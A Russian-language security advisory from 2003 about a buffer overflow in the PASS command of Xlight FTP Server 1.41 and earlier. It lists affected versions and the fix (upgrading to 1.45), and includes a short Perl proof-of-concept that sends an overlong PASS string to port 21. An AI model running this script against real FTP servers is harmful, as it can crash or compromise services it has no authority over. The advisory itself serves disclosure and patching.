Дата публикации: | 25.12.2003 |
Всего просмотров: | 1118 |
Опасность: | Средняя |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: Xlight FTP Server 1.41 и более ранние версии
Описание: Переполнение буфера обнаружено в Xlight FTP Server. Удаленный авторизованный пользователь может выполнить произвольный код. Удаленный авторизованный пользователь может послать специально обработанную команду PASS, чтобы вызвать переполнение буфера. Пример/Эксплоит: #!/usr/bin/perl # Exploit for Xlight FTP server long PASS vulnerability use IO::Socket; unless (@ARGV == 1) { die "usage: $0 host ..." } $host = shift(@ARGV); $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => "ftp(21)", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } $remote->autoflush(1); print $remote "USER anonymous\r\n"; sleep(1); $buf = "A"x54; # Min 54, Max 523 print $remote "PASS ".$buf."\r\n"; sleep(1); close $remote; URL производителя: http://www.xlightftpd.com Решение:Установите обновленную версию программы (1.45): http://www.xlightftpd.com/download.htm |
|
Ссылки: | Xlight FTP Server PASS Buffer Overflow |